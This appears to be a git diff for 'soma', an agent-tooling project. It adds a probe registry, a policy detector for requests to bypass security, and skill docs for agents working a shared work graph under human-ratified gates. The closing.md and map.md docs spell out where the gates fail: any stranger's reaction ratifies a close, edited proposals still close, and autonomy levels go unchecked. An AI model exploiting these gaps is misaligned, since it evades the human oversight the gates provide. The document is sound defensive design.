+  for (let index = 0; index < rest.length; index += 1) {
+    const arg = rest[index];
+    switch (arg) {
+      case "--repo":
+        options.repo = readOption(rest, index, arg);
+        index += 1;
+        break;
+      case "--home-dir":
+        options.homeDir = readOption(rest, index, arg);
+        index += 1;
+        break;
+      case "--soma-home":
+        options.somaHome = readOption(rest, index, arg);
+        index += 1;
+        break;
+      case "--json":
+        json = true;
+        break;
+      default:
+        throw new Error(`Unknown option: ${arg}`);
+    }
+  }
+
+  return { command, action, options, json };
+}
+
 export async function runPolicyCli(parsed: ParsedPolicyArgs): Promise<string> {
+  if (parsed.action === "probes") {
+    const repo = parsed.options.repo ?? (await resolveGraphRepo());
+    const registry = await loadProbeRegistry({
+      repo,
+      ...(parsed.options.homeDir === undefined ? {} : { homeDir: parsed.options.homeDir }),
+      ...(parsed.options.somaHome === undefined ? {} : { somaHome: parsed.options.somaHome }),
+    });
+    return parsed.json ? `${JSON.stringify(registry, null, 2)}\n` : formatProbeRegistry(registry);
+  }
+
   if (parsed.action === "guard") {
     const result = await evaluateToolCallPolicyGuard(parsed.options);
     return parsed.json ? `${JSON.stringify(result, null, 2)}\n` : `${result.decision}: ${result.reason}\n`;
@@ -306,6 +365,49 @@ export async function runPolicyCli(parsed: ParsedPolicyArgs): Promise<string> {
 
   const result = await checkSomaPolicy(parsed.options);
   return parsed.json ? `${JSON.stringify(result, null, 2)}\n` : formatPolicyCheckResult(result);
+}
+
+/**
+ * The registry is read-only from the CLI on purpose. Adding an entry is a
+ * *loosening* mutation on the gate itself (§4), so it stays identity-bound and
+ * fail-closed: the adopter edits the document. A `soma policy probes --allow`
+ * would hand the agent a verb for widening the list that constrains it.
+ */
+function formatProbeRegistry(registry: ProbeRegistry): string {
+  const header = [
+    "Soma probe registry (DD-16 Amendment A)",
+    `repo: ${registry.repo}`,
+    `path: ${registry.path}`,
+  ];
+
+  if (registry.status === "absent") {
+    return [
+      ...header,
+      "status: absent",
+      "",
+      "Every `command` and `url` probe refuses on this machine until the document exists.",
+      "`git-ref-exists`, `git-merged-into` and `artifact-exists` are ungated and keep working.",
+    ].join("\n");
+  }
+
+  if (registry.status === "invalid") {
+    return [...header, "status: invalid", `reason: it ${registry.reason}`, "", "Every `command` and `url` probe refuses until the document parses."].join("\n");
+  }
+
+  return [
+    ...header,
+    "status: loaded",
+    "",
+    "Declared commands:",
+    ...(registry.commands.length > 0
+      ? registry.commands.map((entry) => `- \`${entry.run}\` in ${entry.cwd}`)
+      : ["- none — every `command` probe refuses"]),
+    "",
+    "Declared url hosts:",
+    ...(registry.urlHosts.length > 0 ? registry.urlHosts.map((host) => `- ${host}`) : ["- none — every `url` probe refuses"]),
+    "",
+    "Adding an entry is a loosening mutation (§4) — edit the document yourself; soma ships no verb that writes it.",
+  ].join("\n");
 }
 
 function formatPolicyCheckResult(result: SomaPolicyCheckResult): string {

--- a/src/index.ts
+++ b/src/index.ts
@@ -680,4 +680,53 @@ export {
 } from "./vsa-reconcile";
 export { type CompletenessGap, type CompletenessReport } from "./vsa-schema";
 
+// Work graph (#497, DD-16): typed cross-session effort topology. The contract
+// layer and the store seam are public; backends are imported by name.
+export {
+  WorkGraph,
+  WorkGraphError,
+  agentExternalEvidenceKinds,
+  assertClosable,
+  normalizeKind,
+  parseNodeSpec,
+  parseProbe,
+  renderCloseReceipt,
+  resolveClaimRace,
+  toNode,
+  type AttestationCapability,
+  type AttestationFacts,
+  type AttestationState,
+  type BlockingRef,
+  type ClaimResult,
+  type CloseEvidence,
+  type CloseReceipt,
+  type CommentRef,
+  type CreateNodeSpec,
+  type GraphStore,
+  type NodeBudget,
+  type NodeRef,
+  type NodeState,
+  type NodeStatus,
+  type Probe,
+  type ProbeResult,
+  type ProbeType,
+  type Reaction,
+  type WorkGraphAutonomy,
+  type WorkGraphErrorCode,
+  type WorkGraphEvidenceKind,
+  type WorkGraphNode,
+  type WorkGraphNodeBase,
+} from "./work-graph";
+export {
+  createGhCliTransport,
+  createGitHubGraphStore,
+  decodeNodeBlock,
+  encodeNodeBlock,
+  type DecodedBody,
+  type GhCliTransportOptions,
+  type GitHubApiRequest,
+  type GitHubApiTransport,
+  type GitHubGraphStoreOptions,
+} from "./work-graph-github";
+
 export { SOMA_VERSION } from "./version";

--- a/src/index.ts
+++ b/src/index.ts
@@ -697,6 +697,7 @@ export {
   type AttestationFacts,
   type AttestationState,
   type BlockingRef,
+  type ConfinementProbeRecord,
   type ClaimResult,
   type CloseEvidence,
   type CloseReceipt,
@@ -728,5 +729,26 @@ export {
   type GitHubApiTransport,
   type GitHubGraphStoreOptions,
 } from "./work-graph-github";
+export {
+  allProbesPassed,
+  boundObserved,
+  runCommand,
+  runProbe,
+  runProbes,
+  type CommandOutcome,
+  type CommandRequest,
+  type ProbeRunnerDeps,
+  type ProbeRunnerOptions,
+} from "./work-graph-probes";
+export {
+  checkConfinement,
+  deriveAttestation,
+  findGraphRoot,
+  parseAuthStatusLogins,
+  type AttestationInputs,
+  type AttestationOutcome,
+  type ConfinementDeps,
+  type ConfinementResult,
+} from "./work-graph-attestation";
 
 export { SOMA_VERSION } from "./version";

--- a/src/index.ts
+++ b/src/index.ts
@@ -741,6 +741,22 @@ export {
   type ProbeRunnerOptions,
 } from "./work-graph-probes";
 export {
+  authorizeProbe,
+  isProbeRefusal,
+  loadProbeRegistry,
+  parseProbeRegistry,
+  probeRegistryPath,
+  PROBE_REFUSED_PREFIX,
+  PROBE_REGISTRY_RELATIVE_PATH,
+  PROBE_REGISTRY_VERSION,
+  type DeclaredCommand,
+  type LoadProbeRegistryOptions,
+  type ParseProbeRegistryInput,
+  type ProbeAuthorization,
+  type ProbeRegistry,
+  type ProbeRegistryHomeOptions,
+} from "./work-graph-probe-registry";
+export {
   checkConfinement,
   deriveAttestation,
   findGraphRoot,

--- a/src/runtime-policy.ts
+++ b/src/runtime-policy.ts
@@ -98,9 +98,27 @@ function isNegated(text: string, index: number): boolean {
 }
 
 /**
+ * A blank line ends the thought. Proximity is a proxy for "these words are
+ * about each other", and that proxy dies at a paragraph break: two adjacent
+ * blocks can be about entirely different things.
+ *
+ * The case that forced this: soma's own `CONTEXT.md` ends a paragraph with the
+ * noun "…hides bypass paths." and opens the next section with the heading
+ * "## Inbound security config". Sixty characters apart, zero relationship — and
+ * the resulting `security-disable-request` denied every prompt carrying that
+ * file, which is how sage's Architecture and ContextDrift lenses came to fail on
+ * every review round for months while reporting it as a model contract
+ * deviation.
+ *
+ * A single newline is NOT a boundary: prose wraps, and "please bypass\nthe
+ * security guard" is one sentence and one request.
+ */
+const BLOCK_BOUNDARY = /\n[ \t]*\n/u;
+
+/**
  * Match `verbPattern` (bare forms only) followed by `targetPattern` within
- * `window` chars, rejecting negated occurrences. Returns false when the phrase
- * is a description or a refusal rather than a request.
+ * `window` chars **of the same block**, rejecting negated occurrences. Returns
+ * false when the phrase is a description or a refusal rather than a request.
  */
 function hasUnnegatedRequest(
   normalized: string,
@@ -111,7 +129,10 @@ function hasUnnegatedRequest(
   const verb = new RegExp(verbPattern.source, "gu");
   for (let m = verb.exec(normalized); m !== null; m = verb.exec(normalized)) {
     if (isNegated(normalized, m.index)) continue;
-    if (targetPattern.test(normalized.slice(m.index, m.index + m[0].length + window))) return true;
+    const lookahead = normalized.slice(m.index, m.index + m[0].length + window);
+    const boundary = lookahead.search(BLOCK_BOUNDARY);
+    const sameBlock = boundary === -1 ? lookahead : lookahead.slice(0, boundary);
+    if (targetPattern.test(sameBlock)) return true;
   }
   return false;
 }

--- a/src/skills/orienteer/SKILL.md
+++ b/src/skills/orienteer/SKILL.md
@@ -1,0 +1,108 @@
+---
+name: orienteer
+description: "Plan a huge chunk of work — more than one agent session can hold — as a shared map of decision nodes on the work graph, and resolve them one at a time until the way to the destination is clear. Use to chart a map for a loose idea, or to walk an existing map's frontier. Every operation is a `soma graph` verb; nodes close only through their checkpoint gate."
+effort: medium
+version: 1.0.0
+metadata:
+  short-description: Soma work-graph navigation doctrine
+---
+
+# Orienteer
+
+A loose idea has arrived — too big for one agent session, and wrapped in fog:
+the way from here to the **destination** isn't visible yet. Orienteering is
+about finding that way, not charging at the destination. This skill charts the
+way as a **shared map** on the work graph, then works its **decision nodes** —
+questions whose resolution is a decision, not slices of a build to execute — one
+at a time until the route is clear.
+
+The name is the practice: orienteering is checkpoint-based map navigation, and
+the route only counts if you pass the controls.
+
+## Fast path
+
+Walking an existing map is the common case. Its root node id is the map:
+
+```bash
+soma graph frontier <root>     # what is takeable: open, unassigned, unblocked
+soma graph claim <id>          # claim ONE, before any work
+soma graph node <id>           # read it, and any node it references
+#  … resolve it …
+soma graph close <id>          # runs declared probes; refuses a hollow close
+```
+
+Then append a one-line gist to the map's **Decisions so far**, and graduate any
+fog the answer sharpened. Read `Workflows/WalkTheMap.md` before step one.
+
+## When to use
+
+- A loose idea too big to hold in one session, where the *route* is unclear —
+  not just the work. Chart it: `Workflows/ChartTheMap.md`.
+- An existing map with open nodes. Walk it: `Workflows/WalkTheMap.md`.
+
+**Do not use** when the way to the destination is already clear and the whole
+journey fits one session — you don't need a map, you need to do the work. If
+charting surfaces no fog, say so and stop.
+
+## The verbs
+
+Every graph operation is a `soma graph` verb. **Never reach past them to the
+tracker's own CLI** — the verbs carry the rules (structural validation, cycle
+rejection, claim tie-break, the hollow-close refusal), and a raw tracker write is
+those rules not running. The backend hides behind the CLI, which is what makes
+this doctrine tracker-agnostic by construction.
+
+| Verb | What it does |
+| --- | --- |
+| `soma graph frontier <root>` | open ∧ unassigned ∧ unblocked, confirmed by direct fetch |
+| `soma graph node <id>` | read one node |
+| `soma graph claim <id>` | assign, re-read, tie-break on race |
+| `soma graph add <root> …` | create node (+ `--blocked-by` edges), structurally validated |
+| `soma graph close <id>` | run declared probes, derive the receipt, refuse a hollow close |
+
+`--repo <owner/name>` (or `SOMA_GRAPH_REPO`) picks the backing repository; it
+defaults to the origin remote of the working tree.
+
+## Invariants
+
+- **Plan, don't do.** Each node resolves a decision. The pull to just do the
+  work is usually the signal you've reached the edge of the map and it's time to
+  hand off. An effort can override this in its map **Notes**; absent that,
+  produce decisions, not deliverables.
+- **One node per session** — research nodes excepted.
+- **Claim first**, before any work, so concurrent sessions skip it.
+- **Refer by name.** In everything the human reads, name a map or node by its
+  title, never by a bare id. A wall of `#42, #43, #44` is illegible; the id and
+  URL ride *inside* the name, never stand in for it.
+- **The map is an index, not a store.** A decision lives in exactly one place —
+  its node. The map gists and links, never restates.
+- **HITL means a human speaks for themselves.** The agent never stands in for
+  their side of it; a grilling agent that answers its own questions has broken
+  this.
+- **Scaffold nodes attach below their spawning node, never to the map.** The
+  map's children are the route; work thrown off by one step is an
+  implementation detail of that step, and hanging it off the map makes the
+  frontier report work the effort does not gate on.
+
+## References
+
+Load only what the task routes to.
+
+| File | Load when |
+| --- | --- |
+| `Workflows/ChartTheMap.md` | Charting a new map from a loose idea |
+| `Workflows/WalkTheMap.md` | Resolving a node on an existing map |
+| `references/map.md` | Writing the map body, or creating a node — anatomy, `autonomy` vs `kind`, the four work kinds |
+| `references/closing.md` | Closing a node — checkpoints, probes, the probe registry, AFK vs HITL receipts, attestation |
+| `references/fog.md` | Deciding whether something is fog, a node, or out of scope |
+
+## Lineage
+
+Forked from Matt Pocock's `wayfinder` skill and re-based onto the `soma graph`
+verbs. Upstream is a **manual cherry-pick** relationship: improvements are
+ported by hand through a reviewed PR, never by re-syncing. Two copies with
+diverging conventions would be the two-authoritative-homes problem this doctrine
+exists to prevent.
+
+Doctrine record: DD-16 and its Amendment A in `design/design-decisions.md`; the
+typed contracts in `docs/work-graph.md`.

--- a/src/skills/orienteer/Workflows/ChartTheMap.md
+++ b/src/skills/orienteer/Workflows/ChartTheMap.md
@@ -1,0 +1,68 @@
+# Workflow: Chart the map
+
+The user arrived with a loose idea. Charting is **one session's work and it
+hand-resolves nothing** — you end with a map and its first nodes, not answers.
+
+## 1. Name the destination
+
+Run a `/grilling` and `/domain-modeling` session to pin down what this map is
+finding its way to — the spec, decision, or change. One or two lines that a
+later session can orient to before choosing a node.
+
+The destination fixes the scope, so it is settled first: everything past it is
+out of scope, and everything short of it is either charted or fog.
+
+## 2. Map the frontier
+
+Grill again, **breadth-first** this time: fan out across the whole space rather
+than deep on any one thread, surfacing the open decisions and the first steps
+takeable now.
+
+**If this surfaces no fog** — the way to the destination is already clear, the
+whole journey small enough for one session — you don't need a map. Stop and ask
+the user how they'd like to proceed.
+
+## 3. Create the map
+
+The map is the root node: an issue whose body carries Destination and Notes
+filled in, Decisions-so-far empty, and the fog sketched into **Not yet
+specified**. The body template is in `references/map.md`.
+
+Put in **Notes** what every later session needs before choosing a node: the
+domain, the skills to consult, standing preferences, and any override of the
+plan-don't-do default.
+
+## 4. Create the nodes you can specify now
+
+```bash
+soma graph add <root> \
+  --title "…" --autonomy <auto|propose|approve> --kind <research|prototype|grilling|task> \
+  --checkpoint <id> --body-file <path> \
+  [--probe '{"type":"command","run":"…","timeoutSec":600,"expectExit":0}'] \
+  [--blocked-by <id>]…
+```
+
+Ids don't exist until create returns, so wire the edges you can and make a
+second pass for the rest. Wiring sorts the nodes into the frontier and the
+blocked; everything you can't yet specify stays in the fog.
+
+Before choosing `autonomy` and `kind`, read `references/map.md` — they are
+different vocabularies and only one is enforced. Before declaring probes, read
+`references/closing.md`: an `auto` node with zero probes is refused at creation,
+and a `command` probe the adopter's registry doesn't authorise will refuse at
+close.
+
+Check the result: `soma graph frontier <root>` should return exactly the nodes
+you expect to be takeable. A short frontier means a missing membership edge.
+
+## 5. Fire the research subagents
+
+For each `research` node you just created, spin up a `/research` subagent to
+resolve it in parallel, capturing its findings on a throwaway `research/<name>`
+branch with a context pointer from the node. Research is the one kind that may
+resolve more than one per session.
+
+## 6. Stop
+
+Report the map by name, the frontier, and what stayed in the fog. Do not start
+resolving — that is the next session's work.

--- a/src/skills/orienteer/Workflows/WalkTheMap.md
+++ b/src/skills/orienteer/Workflows/WalkTheMap.md
@@ -1,0 +1,68 @@
+# Workflow: Walk the map
+
+The user arrived with a map — a root node id or URL. A node is **optional**:
+without one, you pick the next decision, not the user.
+
+**One node per session**, research excepted. Other sessions may be writing the
+graph concurrently.
+
+## 1. Load the map
+
+```bash
+soma graph node <root>
+```
+
+Read its body: Destination, Notes, Decisions so far, Not yet specified, Out of
+scope. This is the low-resolution view — do **not** load every child. Orient to
+the destination before choosing anything, and honour whatever the Notes name.
+
+## 2. Choose and claim
+
+```bash
+soma graph frontier <root>
+soma graph claim <id>
+```
+
+If the user named a node, use it. Otherwise take the first frontier node in
+order. **Claim before any work** — the assignment is the claim, and it is what
+makes a concurrent session skip the node.
+
+If the claim reports a lost race, pick another node. The verb re-reads after
+writing rather than assuming it won, so trust what it says.
+
+## 3. Resolve it
+
+**Zoom as needed** — `soma graph node <id>` for any related or closed node on
+demand, rather than loading them up front. Invoke the skills the map's Notes
+name. If in doubt, use `/grilling` and `/domain-modeling`.
+
+A HITL node (`propose` / `approve`) resolves only through live exchange with the
+human. Never stand in for their side of it.
+
+If resolving this node throws off work of its own, attach that **below this
+node**, never to the map (`references/fog.md`).
+
+## 4. Record the resolution
+
+Read `references/closing.md` first — the close refuses a hollow one, and the
+refusal is easier to avoid than to fix.
+
+1. Post the answer as a **resolution comment** on the node.
+2. `soma graph close <id>` — add `--dry-run` first when you are unsure the
+   receipt will hold. For a HITL node this is the two-phase `--propose` →
+   ratification → `--proposal-comment` sequence.
+3. Append a one-line gist plus link to the map's **Decisions so far**. Enough to
+   judge relevance; the detail stays in the node.
+
+## 5. Advance the frontier
+
+- **Add newly-surfaced nodes**, wiring their blockers.
+- **Graduate any fog** the answer made specifiable, clearing each graduated
+  patch from **Not yet specified** so it lives only as its new node.
+- **Rule out of scope** anything the answer revealed to sit past the
+  destination — close it and record one line under **Out of scope**, not under
+  Decisions so far.
+- **Update or delete** nodes the decision invalidated.
+
+Then report: what closed, what it means for the frontier, and what is now
+takeable. Name things by their titles.

--- a/src/skills/orienteer/references/closing.md
+++ b/src/skills/orienteer/references/closing.md
@@ -1,0 +1,113 @@
+# Closing a node
+
+A node closes only through its attached checkpoint's completion gate, and
+`soma graph close` refuses a **hollow close**: no attached checkpoint, a
+declared probe that never ran, a probe that ran and failed, or no
+agent-external evidence entry carrying a pointer someone else can check. When it
+refuses, nothing reaches the tracker.
+
+## Attach the checkpoint at creation
+
+Pass `--checkpoint <id>` to `soma graph add`. There is **no verb that attaches
+one later**, so a node created without it can only be repaired by hand-editing
+its node block on the tracker — and it cannot close until you do.
+
+Pick an id that does not embed the node's own number: the number does not exist
+until after the create call returns.
+
+## Declare probes up front, and declare them so they can run
+
+Evidence is typed by whether it was *specified* before the work and then
+*actually probed*. Self-declared verification is hollow; that split is the whole
+point. A probe is a machine-checkable expectation, never prose:
+
+```json
+{"type": "command", "run": "bun test", "timeoutSec": 900, "expectExit": 0}
+{"type": "url", "target": "https://status.example.com/health", "expectStatus": 200}
+{"type": "git-ref-exists", "ref": "main"}
+{"type": "git-merged-into", "ref": "feat/x", "into": "main"}
+{"type": "artifact-exists", "path": "src/thing.ts", "atRef": "main"}
+```
+
+Timeout expiry is **failure**, never a pass and never a hang. A probe that could
+not run at all is a **failed** probe, never a skipped one.
+
+### The probe registry
+
+`command` and `url` probes run only if the closing machine's registry authorises
+them — probe declarations are tracker content, and tracker content may
+parameterise a probe but never introduce executable code or a network
+destination. The registry lives in soma-home
+(`~/.soma/policy/probe-registry.json`), scoped by repo identity; read it with:
+
+```bash
+soma policy probes [--repo <owner/name>]
+```
+
+- `command` — refused unless the exact `run` string **and** the resolved
+  absolute `cwd` are declared.
+- `url` — refused unless the target host is declared; non-http(s) targets are
+  refused outright.
+- `git-ref-exists`, `git-merged-into`, `artifact-exists` — ungated.
+
+A refused probe is a failed probe, so the close refuses and names the exact
+entry to declare. There is deliberately no verb that adds one: widening the
+registry is the adopter's act, not the agent's.
+
+Practical consequence when charting: prefer probes the adopter has already
+authorised, and expect a close on a fresh machine to refuse until it declares
+them. Reading is unaffected — `soma graph node` and `soma graph frontier` read
+any node regardless, because a node is data.
+
+## AFK close (`auto`)
+
+Close directly. The verb runs the probes and derives the evidence from them;
+`--evidence` may add entries but never substitutes for a passed probe.
+
+```bash
+soma graph close <id> --dry-run   # preview the verdict and receipt, write nothing
+soma graph close <id>
+```
+
+The receipt proves *existence and probe passage, not quality* — sound because
+`auto` work sits below the irreversibility line. Quality ratifies when a
+downstream HITL node consumes the artifact.
+
+## HITL close (`propose` / `approve`)
+
+Two phases, one verb:
+
+```bash
+soma graph close <id> --propose --body-file <path>   # posts the proposal, closes nothing
+#  … the principal reacts 👍 on that comment …
+soma graph close <id> --proposal-comment <comment-id>
+```
+
+The receipt is the ratification, read from the API's author field — never from
+body text. A 👎 from the graph root's author suppresses ratification outright. A
+materially amended proposal is re-posted and needs fresh ratification.
+
+## Attestation
+
+`attestation` is **derived** at close time from the deployment's actual shape —
+never configured, and there is no flag that turns it on. It is a **label, not a
+gate**: the close proceeds either way, because gating on it would deadlock a
+bootstrap in which the nodes that establish credential separation are themselves
+`approve`-class.
+
+`unverified` is the honest default wherever the session can still reach the
+ratifying credential. Read it as visible state, not as a failure, and never
+paper over it — a degraded receipt that looks verified is the one outcome this
+whole construction exists to prevent. The receipt records the *facts* — proposal
+and ratifier ids and authors, root node and author, backend capability, the
+confinement check — so a later reader can tell a wrong ratifier from a reachable
+keyring, which have different fixes.
+
+## Recording the resolution
+
+1. Post the answer as a **resolution comment** on the node — the human-readable
+   half; the close receipt is the machine-readable half.
+2. Close it with `soma graph close`.
+3. Append a one-line gist plus link to the map's **Decisions so far**.
+4. Graduate any fog the answer sharpened (`references/fog.md`), clearing each
+   graduated patch from **Not yet specified** so it lives only as its new node.

--- a/src/skills/orienteer/references/closing.md
+++ b/src/skills/orienteer/references/closing.md
@@ -4,7 +4,12 @@ A node closes only through its attached checkpoint's completion gate, and
 `soma graph close` refuses a **hollow close**: no attached checkpoint, a
 declared probe that never ran, a probe that ran and failed, or no
 agent-external evidence entry carrying a pointer someone else can check. When it
-refuses, nothing reaches the tracker.
+refuses, no close is written.
+
+One write happens before any of that: `--propose` posts its comment (below). It
+checks that the node *has* a checkpoint first, so it cannot publish a proposal
+that can never be acted on — but the probes have not run at that point, so a
+proposal can still be posted for a close that later fails on its probes.
 
 ## Attach the checkpoint at creation
 
@@ -84,8 +89,21 @@ soma graph close <id> --proposal-comment <comment-id>
 ```
 
 The receipt is the ratification, read from the API's author field — never from
-body text. A 👎 from the graph root's author suppresses ratification outright. A
-materially amended proposal is re-posted and needs fresh ratification.
+body text. A 👎 from the graph root's author suppresses ratification outright.
+
+Two things the runtime does **not** do here, both of which are yours to hold:
+
+- **Any non-proposer's 👍 closes the node.** The ratifier is preferred to be the
+  graph root's author, but the fallback is the first other reaction — so on a
+  public tracker a stranger's thumb produces `approved` evidence and the node
+  closes. Only the `attestation` label records that it was not the right human.
+  Read root-author approval as the *thing you must obtain*, not as a condition
+  the verb enforces.
+- **Ratification binds to a comment id, not to its text.** Nothing hashes the
+  proposal body, so a proposal that is ratified and *then edited* still closes
+  on that 👍. "A materially amended proposal is re-posted and needs fresh
+  ratification" is doctrine you follow, not a property the runtime checks: if
+  the resolution changes materially, post a new comment and get a new 👍.
 
 ## Attestation
 

--- a/src/skills/orienteer/references/fog.md
+++ b/src/skills/orienteer/references/fog.md
@@ -1,0 +1,76 @@
+# Fog of war, and what lies past the destination
+
+## Fog of war
+
+The map is _deliberately_ incomplete: don't chart what you can't yet see. Beyond
+the live nodes lies the **fog of war** — the dim view of decisions and
+investigations you can tell are coming but can't yet pin down, because they hang
+on questions still open. Resolving a node clears the fog ahead of it, graduating
+whatever's now specifiable into fresh nodes — one at a time, until the way to
+the destination is clear and no nodes remain.
+
+The map's **Not yet specified** section is where that dim view is written down:
+the suspected question, the area to revisit later. It's the undiscovered
+frontier _toward_ the destination — everything there is in scope, just not sharp
+enough to chart. Write as loosely or as fully as the view allows; it doubles as
+a signpost for collaborators reading where the effort is headed.
+
+### Fog or node?
+
+The test is whether you can state the question precisely now — _not_ whether you
+can answer it now.
+
+- **Node when** the question is already sharp — even if it's blocked and you
+  can't act on it yet.
+- **Not yet specified when** you can't yet phrase it that sharply. Don't
+  pre-slice the fog into node-sized pieces: it's coarser than a node, and one
+  patch may graduate into several nodes, or none, once the frontier reaches it.
+
+**Not yet specified** excludes what's already decided (Decisions so far), what's
+already a live node, and what's out of scope.
+
+### Graduating a patch
+
+When a resolution sharpens a patch, create its node(s) and **clear the patch
+from Not yet specified**, leaving a dated comment recording where it went:
+
+```markdown
+<!-- graduated 2026-08-04 (#526): probe runner hardening → #527. -->
+```
+
+Two records that disagree are worse than one stale one, so a graduated patch
+lives only as its new node.
+
+## Out of scope
+
+Fog only ever gathers _toward_ the destination. The destination fixes the scope,
+so work beyond it is **out of scope** — it isn't fog, and it doesn't belong in
+**Not yet specified**. It gets its own **Out of scope** section on the map: work
+you've consciously ruled out of _this_ effort. Scope, not sharpness, lands it
+there.
+
+Out-of-scope work never graduates — the frontier stops at the destination — so
+it returns only if the destination is redrawn, and then as a fresh effort, not a
+resumption.
+
+Ruling something out of scope is a scoping act, not a step on the route. When a
+node that already exists turns out to sit past the destination — mis-scoped in
+while charting, or exposed by a resolution — **close it** (a closed node is
+unambiguously off the frontier) and leave one line in the **Out of scope**
+section: the gist plus why it's out of scope, linking the closed node. It stays
+out of **Decisions so far**, which records the route actually walked — a scope
+boundary isn't a step on it.
+
+## Scaffold nodes
+
+Work spawned *by* resolving a node — a research subagent's follow-up, a
+prototype's cleanup, anything the node's own work threw off — attaches **below
+its spawning node, never to the map**:
+
+```bash
+soma graph add <the-node-you-are-resolving> --title "…" --autonomy auto …
+```
+
+The map's children are the route. A scaffold node is an implementation detail of
+one step on it, and hanging it off the map makes `soma graph frontier` report
+work the effort does not actually gate on.

--- a/src/skills/orienteer/references/map.md
+++ b/src/skills/orienteer/references/map.md
@@ -85,10 +85,16 @@ resolving a node are linked from the issue, not pasted in.
 Two vocabularies live on a node, and confusing them is the most common mistake.
 
 **`autonomy`** — `auto` / `propose` / `approve`. The **only** classification the
-runtime enforces. It is declared over a projected policy floor and clamped
-never-below-floor at creation, and it decides what evidence closes the node. An
-`auto` node with zero probes is refused at creation: zero probes means zero
-machine-checkable evidence at close.
+runtime enforces, and it decides what evidence closes the node. An `auto` node
+with zero probes is refused at creation: zero probes means zero machine-checkable
+evidence at close.
+
+Choose it honestly, because **nothing checks your choice yet**. The spec has
+`autonomy` declared over a projected policy floor and clamped never-below-floor
+at creation (`docs/work-graph.md` §4); that clamp is not implemented — the
+runtime validates the literal value and nothing more. Until it lands, declaring
+`auto` on work that belongs behind a human is a self-imposed rule, not an
+enforced one.
 
 **`kind`** — `research` / `prototype` / `grilling` / `task`. **Orienteer's own
 vocabulary.** The runtime normalises its form (trimmed, lowercased, non-empty)

--- a/src/skills/orienteer/references/map.md
+++ b/src/skills/orienteer/references/map.md
@@ -1,0 +1,127 @@
+# The map and its nodes
+
+## The map
+
+The map is the **root node** of the effort — one issue, whose children are its
+nodes. Find it by id: an `orienteer:map` label is optional human decoration for
+browsing the tracker, never read by a verb.
+
+The map is an **index**, not a store. It lists the decisions made and points at
+the nodes that hold their detail; a decision lives in exactly one place — its
+node — so the map never restates it, only gists it and links.
+
+### The map body
+
+The whole map at low resolution, loaded once per session. Open nodes are **not**
+listed — they are open children, found by `soma graph frontier`.
+
+```markdown
+## Destination
+
+<what reaching the end of this map looks like — the spec, decision, or change
+this effort is finding its way to. One or two lines; every session orients to it
+before choosing a node.>
+
+## Notes
+
+<domain; skills every session should consult; standing preferences for this effort>
+
+## Decisions so far
+
+<!-- the index — one line per closed node: enough to judge relevance, then zoom
+     the link for the detail the node holds -->
+
+- [<closed node title>](link) — <one-line gist of the answer>
+
+## Not yet specified
+
+<!-- see references/fog.md: in-scope fog you can't chart yet; graduates as the
+     frontier advances -->
+
+## Out of scope
+
+<!-- see references/fog.md: work ruled beyond the destination; closed, never
+     graduates -->
+```
+
+## Nodes
+
+Each node is a child of the map; the backend's issue id is its identity. Its
+body is the question, sized to one 100K token agent session:
+
+```markdown
+## Question
+
+<the decision or investigation this node resolves>
+```
+
+Membership and blocking are **native edges written by the verbs**, not body
+lines:
+
+```bash
+soma graph add <root> \
+  --title "…" --autonomy propose --kind grilling \
+  --checkpoint <id> --body-file <path> \
+  --blocked-by <id> --blocked-by <id>
+```
+
+A node is **unblocked** when every blocker is closed, and the **frontier** is
+the open, unblocked, unclaimed children — the edge of the known. The graph is a
+DAG: an edge that would close a cycle is rejected, because a cycle silently
+removes both nodes from the frontier forever — no claim, no close, no error.
+
+When charting, ids don't exist until create returns, so wire what you can with
+`--blocked-by` and add the rest in a second pass.
+
+A session **claims** a node with `soma graph claim` — first, before any work.
+That assignment *is* the claim; the verb re-reads after writing and reports a
+lost race rather than assuming it won.
+
+The answer isn't part of the body — it's recorded on close. Assets created while
+resolving a node are linked from the issue, not pasted in.
+
+## What the runtime enforces, and what is yours
+
+Two vocabularies live on a node, and confusing them is the most common mistake.
+
+**`autonomy`** — `auto` / `propose` / `approve`. The **only** classification the
+runtime enforces. It is declared over a projected policy floor and clamped
+never-below-floor at creation, and it decides what evidence closes the node. An
+`auto` node with zero probes is refused at creation: zero probes means zero
+machine-checkable evidence at close.
+
+**`kind`** — `research` / `prototype` / `grilling` / `task`. **Orienteer's own
+vocabulary.** The runtime normalises its form (trimmed, lowercased, non-empty)
+and never interprets its meaning. It exists for the human reading the map.
+
+Also on a node: `checkpointId` (required before close — see
+`references/closing.md`), `probes`, and an optional `budget`
+(`tokens` / `agentInvocations` / `wallClockMin`) read as a deterministic circuit
+breaker at claim and execution time.
+
+## The four work kinds
+
+Every node is either **HITL** — human in the loop, worked *with* a human who
+speaks for themselves — or **AFK**, driven by the agent alone. A HITL node only
+resolves through that live exchange. This is doctrine, and `autonomy` is how the
+runtime holds you to it: HITL work belongs on `propose` or `approve`, never
+`auto`.
+
+- **Research** (AFK): Reading documentation, third-party APIs, or local
+  resources like knowledge bases to surface a fact a decision waits on. Resolved
+  by a `/research` **subagent**. Use when knowledge outside the current working
+  directory is required.
+- **Prototype** (HITL): Raise the fidelity of the discussion by making a cheap,
+  rough, concrete artifact to react to — an outline, a rough take, a stub, or
+  UI/logic code via the `/prototype` skill. Links the prototype as an asset. Use
+  when "how should it look" or "how should it behave" is the key question.
+- **Grilling** (HITL): Conversation via the `/grilling` and `/domain-modeling`
+  skills, one question at a time. The default case.
+- **Task** (HITL or AFK): Manual work that must happen before a *decision* can
+  be made — nothing to decide, prototype, or research, but the discussion is
+  blocked until it's done. Signing up for a service so its API can be judged,
+  provisioning access, moving data so its shape can be seen. This is the one
+  kind that *does* rather than decides — and it earns its place by unblocking a
+  decision, not by delivering the destination. Resolved when the work is done;
+  the answer records what was done and any resulting facts (credentials
+  location, new URLs, row counts) later nodes depend on.

--- a/src/work-graph-attestation.ts
+++ b/src/work-graph-attestation.ts
@@ -1,0 +1,248 @@
+/**
+ * Attestation derivation for close receipts (`docs/work-graph.md` §3.2, #502/#498).
+ *
+ * `attestation` is **derived at close time, never configured**. There is no flag
+ * and no provisioning step that turns verification on: an adopter with real
+ * credential isolation gets `verified` automatically, one without gets honest
+ * `unverified` forever, and neither configures anything.
+ *
+ * `verified` asserts a *trust* claim — a human the agent cannot impersonate
+ * ratified this — not merely that two logins appear. All four conjuncts must
+ * hold; any failure yields `unverified`. It is a **label, not a gate**: `close`
+ * proceeds either way, because refusing on `unverified` would deadlock the
+ * bootstrap (the nodes that establish credential separation are themselves
+ * `approve`-class, so they could never close).
+ *
